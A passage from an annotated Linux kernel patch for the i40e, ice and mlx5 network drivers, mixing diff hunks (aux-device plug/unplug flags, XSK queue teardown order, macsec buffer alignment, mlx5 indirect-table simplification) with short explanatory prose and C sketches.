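    /* Sketch: the EEPROM stores the address byte-reversed starting at
     * offset 0x06, so read it backwards into a scratch buffer first.
     */
    for (i = 0; i < ETH_ALEN; i++)
    	mac[i] = readb(eth_addr + 0x0b - i);
    eth_hw_addr_set(netdevice, mac);
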
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index d30bc38725e97..da0cf87d3a1ca 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -15491,6 +15491,7 @@ static int i40e_init_recovery_mode(struct i40e_pf *pf, struct i40e_hw *hw)
+ 	int err;
+ 	int v_idx;
+ 
++	pci_set_drvdata(pf->pdev, pf);
+ 	pci_save_state(pf->pdev);
+ 
+ 	/* set up periodic task facility */
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index e04871379baad..ca6b877fdde81 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -485,6 +485,7 @@ enum ice_pf_flags {
+ 	ICE_FLAG_VF_VLAN_PRUNING,
+ 	ICE_FLAG_LINK_LENIENT_MODE_ENA,
+ 	ICE_FLAG_PLUG_AUX_DEV,
++	ICE_FLAG_UNPLUG_AUX_DEV,
+ 	ICE_FLAG_MTU_CHANGED,
+ 	ICE_FLAG_GNSS,			/* GNSS successfully initialized */
+ 	ICE_PF_FLAGS_NBITS		/* must be last */
+@@ -926,16 +927,11 @@ static inline void ice_set_rdma_cap(struct ice_pf *pf)
+  */
+ static inline void ice_clear_rdma_cap(struct ice_pf *pf)
+ {
+-	/* We can directly unplug aux device here only if the flag bit
+-	 * ICE_FLAG_PLUG_AUX_DEV is not set because ice_unplug_aux_dev()
+-	 * could race with ice_plug_aux_dev() called from
+-	 * ice_service_task(). In this case we only clear that bit now and
+-	 * aux device will be unplugged later once ice_plug_aux_device()
+-	 * called from ice_service_task() finishes (see ice_service_task()).
++	/* Defer the unplug to the service task to avoid the RTNL lock,
++	 * and clear the PLUG bit so that pending plugs don't interfere.
+ 	 */
+-	if (!test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
+-		ice_unplug_aux_dev(pf);
+-
++	clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags);
++	set_bit(ICE_FLAG_UNPLUG_AUX_DEV, pf->flags);
+ 	clear_bit(ICE_FLAG_RDMA_ENA, pf->flags);
+ }
+ #endif /* _ICE_H_ */
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 3c6bb3f9ac780..cfc57cfc46e42 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -2326,18 +2326,15 @@ static void ice_service_task(struct work_struct *work)
+ 		}
+ 	}
+ 
+-	if (test_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags)) {
+-		/* Plug aux device per request */
+-		ice_plug_aux_dev(pf);
++	/* Unplug the aux device per request; if an unplug request came in
++	 * while a plug request was being processed, this handles it.
++	 */
++	if (test_and_clear_bit(ICE_FLAG_UNPLUG_AUX_DEV, pf->flags))
++		ice_unplug_aux_dev(pf);
+ 
+-		/* Mark plugging as done but check whether unplug was
+-		 * requested during ice_plug_aux_dev() call
+-		 * (e.g. from ice_clear_rdma_cap()) and if so then
+-		 * plug aux device.
+-		 */
+-		if (!test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
+-			ice_unplug_aux_dev(pf);
+-	}
++	/* Plug aux device per request */
++	if (test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
++		ice_plug_aux_dev(pf);
+ 
+ 	if (test_and_clear_bit(ICE_FLAG_MTU_CHANGED, pf->flags)) {
+ 		struct iidc_event *event;
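
Together, the two ice hunks replace the racy plug-then-maybe-unplug dance with a
pair of flag bits that only the service task consumes, so requesters never touch
the aux device directly. The request/consume split in miniature, using the flag
names from the hunks:

    /* Sketch, requester side: queue the work instead of unplugging
     * inline (which would need the RTNL lock).
     */
    clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags);
    set_bit(ICE_FLAG_UNPLUG_AUX_DEV, pf->flags);

    /* Sketch, service-task side: drain unplug requests before plug
     * requests, so a plug filed after an unplug still takes effect.
     */
    if (test_and_clear_bit(ICE_FLAG_UNPLUG_AUX_DEV, pf->flags))
    	ice_unplug_aux_dev(pf);
    if (test_and_clear_bit(ICE_FLAG_PLUG_AUX_DEV, pf->flags))
    	ice_plug_aux_dev(pf);
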
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 65468cdc25870..41ee081eb8875 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -173,8 +173,6 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 	}
+ 	netif_tx_stop_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
+ 
+-	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
+-
+ 	ice_fill_txq_meta(vsi, tx_ring, &txq_meta);
+ 	err = ice_vsi_stop_tx_ring(vsi, ICE_NO_RESET, 0, tx_ring, &txq_meta);
+ 	if (err)
+@@ -189,10 +187,11 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 		if (err)
+ 			return err;
+ 	}
++	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
++
+ 	err = ice_vsi_ctrl_one_rx_ring(vsi, false, q_idx, true);
+ 	if (err)
+ 		return err;
+-	ice_clean_rx_ring(rx_ring);
+ 
+ 	ice_qvec_toggle_napi(vsi, q_vector, false);
+ 	ice_qp_clean_rings(vsi, q_idx);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en.h b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+index 26a23047f1f3b..bc76fe6b06230 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+@@ -313,7 +313,6 @@ struct mlx5e_params {
+ 		} channel;
+ 	} mqprio;
+ 	bool rx_cqe_compress_def;
+-	bool tunneled_offload_en;
+ 	struct dim_cq_moder rx_cq_moderation;
+ 	struct dim_cq_moder tx_cq_moderation;
+ 	struct mlx5e_packet_merge_param packet_merge;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+index e6f64d890fb34..83bb0811e7741 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+@@ -745,8 +745,6 @@ int mlx5e_tc_tun_route_lookup(struct mlx5e_priv *priv,
+ 		if (err)
+ 			goto out;
+ 
+-		esw_attr->rx_tun_attr->vni = MLX5_GET(fte_match_param, spec->match_value,
+-						      misc_parameters.vxlan_vni);
+ 		esw_attr->rx_tun_attr->decap_vport = vport_num;
+ 	} else if (netif_is_ovs_master(attr.route_dev) && mlx5e_tc_int_port_supported(esw)) {
+ 		int_port = mlx5e_tc_int_port_get(mlx5e_get_int_port_priv(priv),
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index b92d541b5286e..0c23340bfcc75 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -89,8 +89,8 @@ struct mlx5e_macsec_rx_sc {
+ };
+ 
+ struct mlx5e_macsec_umr {
++	u8 __aligned(64) ctx[MLX5_ST_SZ_BYTES(macsec_aso)];
+ 	dma_addr_t dma_addr;
+-	u8 ctx[MLX5_ST_SZ_BYTES(macsec_aso)];
+ 	u32 mkey;
+ };
+ 
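
Reordering the macsec struct puts the device-visible ctx[] first and forces
64-byte alignment; with dma_addr_t first, ctx sat at an 8-byte offset and could
straddle the boundary the hardware expects. A sketch of the general pattern,
with an illustrative compile-time check added (the struct name and size here
are assumptions, not the driver's):

    #include <linux/build_bug.h>
    #include <linux/stddef.h>

    struct hw_ctx_example {
    	u8 __aligned(64) ctx[64];	/* device-visible, needs 64B alignment */
    	dma_addr_t dma_addr;		/* host bookkeeping may follow */
    };

    /* Sketch: assert the layout at build time so a later field shuffle
     * cannot silently misalign the device-visible buffer again.
     */
    static_assert(offsetof(struct hw_ctx_example, ctx) == 0);
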
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 142ed2d98cd5d..609a49c1e09e6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4911,8 +4911,6 @@ void mlx5e_build_nic_params(struct mlx5e_priv *priv, struct mlx5e_xsk *xsk, u16
+ 	/* TX inline */
+ 	mlx5_query_min_inline(mdev, &params->tx_min_inline_mode);
+ 
+-	params->tunneled_offload_en = mlx5_tunnel_inner_ft_supported(mdev);
+-
+ 	/* AF_XDP */
+ 	params->xsk = xsk;
+ 
+@@ -5216,7 +5214,7 @@ static int mlx5e_init_nic_rx(struct mlx5e_priv *priv)
+ 	}
+ 
+ 	features = MLX5E_RX_RES_FEATURE_PTP;
+-	if (priv->channels.params.tunneled_offload_en)
++	if (mlx5_tunnel_inner_ft_supported(mdev))
+ 		features |= MLX5E_RX_RES_FEATURE_INNER_FT;
+ 	err = mlx5e_rx_res_init(priv->rx_res, priv->mdev, features,
+ 				priv->max_nch, priv->drop_rq.rqn,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 794cd8dfe9c91..0f744131c6869 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -707,7 +707,6 @@ static void mlx5e_build_rep_params(struct net_device *netdev)
+ 	mlx5e_set_rx_cq_mode_params(params, cq_period_mode);
+ 
+ 	params->mqprio.num_tc       = 1;
+-	params->tunneled_offload_en = false;
+ 	if (rep->vport != MLX5_VPORT_UPLINK)
+ 		params->vlan_strip_disable = true;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index c1cf3917baa43..73af062a87830 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -2401,13 +2401,13 @@ static int parse_tunnel_attr(struct mlx5e_priv *priv,
+ 		err = mlx5e_tc_set_attr_rx_tun(flow, spec);
+ 		if (err)
+ 			return err;
+-	} else if (tunnel && tunnel->tunnel_type == MLX5E_TC_TUNNEL_TYPE_VXLAN) {
++	} else if (tunnel) {
+ 		struct mlx5_flow_spec *tmp_spec;
+ 
+ 		tmp_spec = kvzalloc(sizeof(*tmp_spec), GFP_KERNEL);
+ 		if (!tmp_spec) {
+-			NL_SET_ERR_MSG_MOD(extack, "Failed to allocate memory for vxlan tmp spec");
+-			netdev_warn(priv->netdev, "Failed to allocate memory for vxlan tmp spec");
++			NL_SET_ERR_MSG_MOD(extack, "Failed to allocate memory for tunnel tmp spec");
++			netdev_warn(priv->netdev, "Failed to allocate memory for tunnel tmp spec");
+ 			return -ENOMEM;
+ 		}
+ 		memcpy(tmp_spec, spec, sizeof(*tmp_spec));
+@@ -4054,6 +4054,7 @@ int mlx5e_set_fwd_to_int_port_actions(struct mlx5e_priv *priv,
+ 
+ 	esw_attr->dest_int_port = dest_int_port;
+ 	esw_attr->dests[out_index].flags |= MLX5_ESW_DEST_CHAIN_WITH_SRC_PORT_CHANGE;
++	esw_attr->split_count = out_index;
+ 
+ 	/* Forward to root fdb for matching against the new source vport */
+ 	attr->dest_chain = 0;
+@@ -4311,9 +4312,6 @@ __mlx5e_add_fdb_flow(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto err_free;
+ 
+-	/* always set IP version for indirect table handling */
+-	flow->attr->ip_version = mlx5e_tc_get_ip_version(&parse_attr->spec, true);
+-
+ 	err = parse_tc_fdb_actions(priv, &rule->action, flow, extack);
+ 	if (err)
+ 		goto err_free;
+@@ -5162,6 +5160,16 @@ err_tun_mapping:
+ 
+ void mlx5e_tc_esw_cleanup(struct mlx5_rep_uplink_priv *uplink_priv)
+ {
++	struct mlx5e_rep_priv *rpriv;
++	struct mlx5_eswitch *esw;
++	struct mlx5e_priv *priv;
++
++	rpriv = container_of(uplink_priv, struct mlx5e_rep_priv, uplink_priv);
++	priv = netdev_priv(rpriv->netdev);
++	esw = priv->mdev->priv.eswitch;
++
++	mlx5e_tc_clean_fdb_peer_flows(esw);
++
+ 	mlx5e_tc_tun_cleanup(uplink_priv->encap);
+ 
+ 	mapping_destroy(uplink_priv->tunnel_enc_opts_mapping);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.h b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.h
+index 48241317a5354..edd5f09440f9f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.h
+@@ -82,7 +82,6 @@ struct mlx5_flow_attr {
+ 	struct mlx5_flow_table *dest_ft;
+ 	u8 inner_match_level;
+ 	u8 outer_match_level;
+-	u8 ip_version;
+ 	u8 tun_ip_version;
+ 	int tunnel_id; /* mapped tunnel id */
+ 	u32 flags;
+@@ -129,7 +128,6 @@ struct mlx5_rx_tun_attr {
+ 		__be32 v4;
+ 		struct in6_addr v6;
+ 	} dst_ip; /* Valid if decap_vport is not zero */
+-	u32 vni;
+ };
+ 
+ #define MLX5E_TC_TABLE_CHAIN_TAG_BITS 16
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.c
+index c9a91158e99c9..8a94870c5b43c 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.c
+@@ -16,18 +16,12 @@
+ #include "lib/fs_chains.h"
+ #include "en/mod_hdr.h"
+ 
+-#define MLX5_ESW_INDIR_TABLE_SIZE 128
+-#define MLX5_ESW_INDIR_TABLE_RECIRC_IDX_MAX (MLX5_ESW_INDIR_TABLE_SIZE - 2)
++#define MLX5_ESW_INDIR_TABLE_SIZE 2
++#define MLX5_ESW_INDIR_TABLE_RECIRC_IDX (MLX5_ESW_INDIR_TABLE_SIZE - 2)
+ #define MLX5_ESW_INDIR_TABLE_FWD_IDX (MLX5_ESW_INDIR_TABLE_SIZE - 1)
+ 
+ struct mlx5_esw_indir_table_rule {
+-	struct list_head list;
+ 	struct mlx5_flow_handle *handle;
+-	union {
+-		__be32 v4;
+-		struct in6_addr v6;
+-	} dst_ip;
+-	u32 vni;
+ 	struct mlx5_modify_hdr *mh;
+ 	refcount_t refcnt;
+ };
+@@ -38,12 +32,10 @@ struct mlx5_esw_indir_table_entry {
+ 	struct mlx5_flow_group *recirc_grp;
+ 	struct mlx5_flow_group *fwd_grp;
+ 	struct mlx5_flow_handle *fwd_rule;
+-	struct list_head recirc_rules;
+-	int recirc_cnt;
++	struct mlx5_esw_indir_table_rule *recirc_rule;
+ 	int fwd_ref;
+ 
+ 	u16 vport;
+-	u8 ip_version;
+ };
+ 
+ struct mlx5_esw_indir_table {
+@@ -89,7 +81,6 @@ mlx5_esw_indir_table_needed(struct mlx5_eswitch *esw,
+ 	return esw_attr->in_rep->vport == MLX5_VPORT_UPLINK &&
+ 		vf_sf_vport &&
+ 		esw->dev == dest_mdev &&
+-		attr->ip_version &&
+ 		attr->flags & MLX5_ATTR_FLAG_SRC_REWRITE;
+ }
+ 
+@@ -101,27 +92,8 @@ mlx5_esw_indir_table_decap_vport(struct mlx5_flow_attr *attr)
+ 	return esw_attr->rx_tun_attr ? esw_attr->rx_tun_attr->decap_vport : 0;
+ }
+ 
+-static struct mlx5_esw_indir_table_rule *
+-mlx5_esw_indir_table_rule_lookup(struct mlx5_esw_indir_table_entry *e,
+-				 struct mlx5_esw_flow_attr *attr)
+-{
+-	struct mlx5_esw_indir_table_rule *rule;
+-
+-	list_for_each_entry(rule, &e->recirc_rules, list)
+-		if (rule->vni == attr->rx_tun_attr->vni &&
+-		    !memcmp(&rule->dst_ip, &attr->rx_tun_attr->dst_ip,
+-			    sizeof(attr->rx_tun_attr->dst_ip)))
+-			goto found;
+-	return NULL;
+-
+-found:
+-	refcount_inc(&rule->refcnt);
+-	return rule;
+-}
+-
+ static int mlx5_esw_indir_table_rule_get(struct mlx5_eswitch *esw,
+ 					 struct mlx5_flow_attr *attr,
+-					 struct mlx5_flow_spec *spec,
+ 					 struct mlx5_esw_indir_table_entry *e)
+ {
+ 	struct mlx5_esw_flow_attr *esw_attr = attr->esw_attr;
+@@ -130,73 +102,18 @@ static int mlx5_esw_indir_table_rule_get(struct mlx5_eswitch *esw,
+ 	struct mlx5_flow_destination dest = {};
+ 	struct mlx5_esw_indir_table_rule *rule;
+ 	struct mlx5_flow_act flow_act = {};
+-	struct mlx5_flow_spec *rule_spec;
+ 	struct mlx5_flow_handle *handle;
+ 	int err = 0;
+ 	u32 data;
+ 
+-	rule = mlx5_esw_indir_table_rule_lookup(e, esw_attr);
+-	if (rule)
++	if (e->recirc_rule) {
++		refcount_inc(&e->recirc_rule->refcnt);
+ 		return 0;
+-
+-	if (e->recirc_cnt == MLX5_ESW_INDIR_TABLE_RECIRC_IDX_MAX)
+-		return -EINVAL;
+-
+-	rule_spec = kvzalloc(sizeof(*rule_spec), GFP_KERNEL);
+-	if (!rule_spec)
+-		return -ENOMEM;
+-
+-	rule = kzalloc(sizeof(*rule), GFP_KERNEL);
+-	if (!rule) {
+-		err = -ENOMEM;
+-		goto out;
+ 	}
+ 
+-	rule_spec->match_criteria_enable = MLX5_MATCH_OUTER_HEADERS |
+-					   MLX5_MATCH_MISC_PARAMETERS |
+-					   MLX5_MATCH_MISC_PARAMETERS_2;
+-	if (MLX5_CAP_FLOWTABLE_NIC_RX(esw->dev, ft_field_support.outer_ip_version)) {
+-		MLX5_SET(fte_match_param, rule_spec->match_criteria,
+-			 outer_headers.ip_version, 0xf);
+-		MLX5_SET(fte_match_param, rule_spec->match_value, outer_headers.ip_version,
+-			 attr->ip_version);
+-	} else if (attr->ip_version) {
+-		MLX5_SET_TO_ONES(fte_match_param, rule_spec->match_criteria,
+-				 outer_headers.ethertype);
+-		MLX5_SET(fte_match_param, rule_spec->match_value, outer_headers.ethertype,
+-			 (attr->ip_version == 4 ? ETH_P_IP : ETH_P_IPV6));
+-	} else {
+-		err = -EOPNOTSUPP;
+-		goto err_ethertype;
+-	}
+-
+-	if (attr->ip_version == 4) {
+-		MLX5_SET_TO_ONES(fte_match_param, rule_spec->match_criteria,
+-				 outer_headers.dst_ipv4_dst_ipv6.ipv4_layout.ipv4);
+-		MLX5_SET(fte_match_param, rule_spec->match_value,
+-			 outer_headers.dst_ipv4_dst_ipv6.ipv4_layout.ipv4,
+-			 ntohl(esw_attr->rx_tun_attr->dst_ip.v4));
+-	} else if (attr->ip_version == 6) {
+-		int len = sizeof(struct in6_addr);
+-
+-		memset(MLX5_ADDR_OF(fte_match_param, rule_spec->match_criteria,
+-				    outer_headers.dst_ipv4_dst_ipv6.ipv6_layout.ipv6),
+-		       0xff, len);
+-		memcpy(MLX5_ADDR_OF(fte_match_param, rule_spec->match_value,
+-				    outer_headers.dst_ipv4_dst_ipv6.ipv6_layout.ipv6),
+-		       &esw_attr->rx_tun_attr->dst_ip.v6, len);
+-	}
+-
+-	MLX5_SET_TO_ONES(fte_match_param, rule_spec->match_criteria,
+-			 misc_parameters.vxlan_vni);
+-	MLX5_SET(fte_match_param, rule_spec->match_value, misc_parameters.vxlan_vni,
+-		 MLX5_GET(fte_match_param, spec->match_value, misc_parameters.vxlan_vni));
+-
+-	MLX5_SET(fte_match_param, rule_spec->match_criteria,
+-		 misc_parameters_2.metadata_reg_c_0, mlx5_eswitch_get_vport_metadata_mask());
+-	MLX5_SET(fte_match_param, rule_spec->match_value, misc_parameters_2.metadata_reg_c_0,
+-		 mlx5_eswitch_get_vport_metadata_for_match(esw_attr->in_mdev->priv.eswitch,
+-							   MLX5_VPORT_UPLINK));
++	rule = kzalloc(sizeof(*rule), GFP_KERNEL);
++	if (!rule)
++		return -ENOMEM;
+ 
+ 	/* Modify flow source to recirculate packet */
+ 	data = mlx5_eswitch_get_vport_metadata_for_set(esw, esw_attr->rx_tun_attr->decap_vport);
+@@ -219,13 +136,14 @@ static int mlx5_esw_indir_table_rule_get(struct mlx5_eswitch *esw,
+ 
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST | MLX5_FLOW_CONTEXT_ACTION_MOD_HDR;
+ 	flow_act.flags = FLOW_ACT_IGNORE_FLOW_LEVEL | FLOW_ACT_NO_APPEND;
++	flow_act.fg = e->recirc_grp;
+ 	dest.type = MLX5_FLOW_DESTINATION_TYPE_FLOW_TABLE;
+ 	dest.ft = mlx5_chains_get_table(chains, 0, 1, 0);
+ 	if (IS_ERR(dest.ft)) {
+ 		err = PTR_ERR(dest.ft);
+ 		goto err_table;
+ 	}
+-	handle = mlx5_add_flow_rules(e->ft, rule_spec, &flow_act, &dest, 1);
++	handle = mlx5_add_flow_rules(e->ft, NULL, &flow_act, &dest, 1);
+ 	if (IS_ERR(handle)) {
+ 		err = PTR_ERR(handle);
+ 		goto err_handle;
+@@ -233,14 +151,10 @@ static int mlx5_esw_indir_table_rule_get(struct mlx5_eswitch *esw,
+ 
+ 	mlx5e_mod_hdr_dealloc(&mod_acts);
+ 	rule->handle = handle;
+-	rule->vni = esw_attr->rx_tun_attr->vni;
+ 	rule->mh = flow_act.modify_hdr;
+-	memcpy(&rule->dst_ip, &esw_attr->rx_tun_attr->dst_ip,
+-	       sizeof(esw_attr->rx_tun_attr->dst_ip));
+ 	refcount_set(&rule->refcnt, 1);
+-	list_add(&rule->list, &e->recirc_rules);
+-	e->recirc_cnt++;
+-	goto out;
++	e->recirc_rule = rule;
++	return 0;
+ 
+ err_handle:
+ 	mlx5_chains_put_table(chains, 0, 1, 0);
+@@ -250,89 +164,44 @@ err_mod_hdr_alloc:
+ err_mod_hdr_regc1:
+ 	mlx5e_mod_hdr_dealloc(&mod_acts);
+ err_mod_hdr_regc0:
+-err_ethertype:
+ 	kfree(rule);
+-out:
+-	kvfree(rule_spec);
+ 	return err;
+ }
+ 
+ static void mlx5_esw_indir_table_rule_put(struct mlx5_eswitch *esw,
+-					  struct mlx5_flow_attr *attr,
+ 					  struct mlx5_esw_indir_table_entry *e)
+ {
+-	struct mlx5_esw_flow_attr *esw_attr = attr->esw_attr;
++	struct mlx5_esw_indir_table_rule *rule = e->recirc_rule;
+ 	struct mlx5_fs_chains *chains = esw_chains(esw);
+-	struct mlx5_esw_indir_table_rule *rule;
+ 
+-	list_for_each_entry(rule, &e->recirc_rules, list)
+-		if (rule->vni == esw_attr->rx_tun_attr->vni &&
+-		    !memcmp(&rule->dst_ip, &esw_attr->rx_tun_attr->dst_ip,
+-			    sizeof(esw_attr->rx_tun_attr->dst_ip)))
+-			goto found;
+-
+-	return;
++	if (!rule)
++		return;
+ 
+-found:
+ 	if (!refcount_dec_and_test(&rule->refcnt))
+ 		return;
+ 
+ 	mlx5_del_flow_rules(rule->handle);
+ 	mlx5_chains_put_table(chains, 0, 1, 0);
+ 	mlx5_modify_header_dealloc(esw->dev, rule->mh);
+-	list_del(&rule->list);
+ 	kfree(rule);
+-	e->recirc_cnt--;
++	e->recirc_rule = NULL;
+ }
+ 
+-static int mlx5_create_indir_recirc_group(struct mlx5_eswitch *esw,
+-					  struct mlx5_flow_attr *attr,
+-					  struct mlx5_flow_spec *spec,
+-					  struct mlx5_esw_indir_table_entry *e)
++static int mlx5_create_indir_recirc_group(struct mlx5_esw_indir_table_entry *e)
+ {
+ 	int err = 0, inlen = MLX5_ST_SZ_BYTES(create_flow_group_in);
+-	u32 *in, *match;
++	u32 *in;
+ 
+ 	in = kvzalloc(inlen, GFP_KERNEL);
+ 	if (!in)
+ 		return -ENOMEM;
+ 
+-	MLX5_SET(create_flow_group_in, in, match_criteria_enable, MLX5_MATCH_OUTER_HEADERS |
+-		 MLX5_MATCH_MISC_PARAMETERS | MLX5_MATCH_MISC_PARAMETERS_2);
+-	match = MLX5_ADDR_OF(create_flow_group_in, in, match_criteria);
+-
+-	if (MLX5_CAP_FLOWTABLE_NIC_RX(esw->dev, ft_field_support.outer_ip_version))
+-		MLX5_SET(fte_match_param, match, outer_headers.ip_version, 0xf);
+-	else
+-		MLX5_SET_TO_ONES(fte_match_param, match, outer_headers.ethertype);
+-
+-	if (attr->ip_version == 4) {
+-		MLX5_SET_TO_ONES(fte_match_param, match,
+-				 outer_headers.dst_ipv4_dst_ipv6.ipv4_layout.ipv4);
+-	} else if (attr->ip_version == 6) {
+-		memset(MLX5_ADDR_OF(fte_match_param, match,
+-				    outer_headers.dst_ipv4_dst_ipv6.ipv6_layout.ipv6),
+-		       0xff, sizeof(struct in6_addr));
+-	} else {
+-		err = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	MLX5_SET_TO_ONES(fte_match_param, match, misc_parameters.vxlan_vni);
+-	MLX5_SET(fte_match_param, match, misc_parameters_2.metadata_reg_c_0,
+-		 mlx5_eswitch_get_vport_metadata_mask());
+ 	MLX5_SET(create_flow_group_in, in, start_flow_index, 0);
+-	MLX5_SET(create_flow_group_in, in, end_flow_index, MLX5_ESW_INDIR_TABLE_RECIRC_IDX_MAX);
++	MLX5_SET(create_flow_group_in, in, end_flow_index, MLX5_ESW_INDIR_TABLE_RECIRC_IDX);
+ 	e->recirc_grp = mlx5_create_flow_group(e->ft, in);
+-	if (IS_ERR(e->recirc_grp)) {
++	if (IS_ERR(e->recirc_grp))
+ 		err = PTR_ERR(e->recirc_grp);
+-		goto out;
+-	}
+ 
+-	INIT_LIST_HEAD(&e->recirc_rules);
+-	e->recirc_cnt = 0;
+-
+-out:
+ 	kvfree(in);
+ 	return err;
+ }
+@@ -366,6 +235,7 @@ static int mlx5_create_indir_fwd_group(struct mlx5_eswitch *esw,
+ 	}
+ 
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
++	flow_act.fg = e->fwd_grp;
+ 	dest.type = MLX5_FLOW_DESTINATION_TYPE_VPORT;
+ 	dest.vport.num = e->vport;
+ 	dest.vport.vhca_id = MLX5_CAP_GEN(esw->dev, vhca_id);
+@@ -384,7 +254,7 @@ err_out:
+ 
+ static struct mlx5_esw_indir_table_entry *
+ mlx5_esw_indir_table_entry_create(struct mlx5_eswitch *esw, struct mlx5_flow_attr *attr,
+-				  struct mlx5_flow_spec *spec, u16 vport, bool decap)
++				  u16 vport, bool decap)
+ {
+ 	struct mlx5_flow_table_attr ft_attr = {};
+ 	struct mlx5_flow_namespace *root_ns;
+@@ -412,15 +282,14 @@ mlx5_esw_indir_table_entry_create(struct mlx5_eswitch *esw, struct mlx5_flow_att
+ 	}
+ 	e->ft = ft;
+ 	e->vport = vport;
+-	e->ip_version = attr->ip_version;
+ 	e->fwd_ref = !decap;
+ 
+-	err = mlx5_create_indir_recirc_group(esw, attr, spec, e);
++	err = mlx5_create_indir_recirc_group(e);
+ 	if (err)
+ 		goto recirc_grp_err;
+ 
+ 	if (decap) {
+-		err = mlx5_esw_indir_table_rule_get(esw, attr, spec, e);
++		err = mlx5_esw_indir_table_rule_get(esw, attr, e);
+ 		if (err)
+ 			goto recirc_rule_err;
+ 	}
+@@ -430,13 +299,13 @@ mlx5_esw_indir_table_entry_create(struct mlx5_eswitch *esw, struct mlx5_flow_att
+ 		goto fwd_grp_err;
+ 
+ 	hash_add(esw->fdb_table.offloads.indir->table, &e->hlist,
+-		 vport << 16 | attr->ip_version);
++		 vport << 16);
+ 
+ 	return e;
+ 
+ fwd_grp_err:
+ 	if (decap)
+-		mlx5_esw_indir_table_rule_put(esw, attr, e);
++		mlx5_esw_indir_table_rule_put(esw, e);
+ recirc_rule_err:
+ 	mlx5_destroy_flow_group(e->recirc_grp);
+ recirc_grp_err:
+@@ -447,13 +316,13 @@ tbl_err:
+ }
+ 
+ static struct mlx5_esw_indir_table_entry *
+-mlx5_esw_indir_table_entry_lookup(struct mlx5_eswitch *esw, u16 vport, u8 ip_version)
++mlx5_esw_indir_table_entry_lookup(struct mlx5_eswitch *esw, u16 vport)
+ {
+ 	struct mlx5_esw_indir_table_entry *e;
+-	u32 key = vport << 16 | ip_version;
++	u32 key = vport << 16;
+ 
+ 	hash_for_each_possible(esw->fdb_table.offloads.indir->table, e, hlist, key)
+-		if (e->vport == vport && e->ip_version == ip_version)
++		if (e->vport == vport)
+ 			return e;
+ 
+ 	return NULL;
+@@ -461,24 +330,23 @@ mlx5_esw_indir_table_entry_lookup(struct mlx5_eswitch *esw, u16 vport, u8 ip_ver
+ 
+ struct mlx5_flow_table *mlx5_esw_indir_table_get(struct mlx5_eswitch *esw,
+ 						 struct mlx5_flow_attr *attr,
+-						 struct mlx5_flow_spec *spec,
+ 						 u16 vport, bool decap)
+ {
+ 	struct mlx5_esw_indir_table_entry *e;
+ 	int err;
+ 
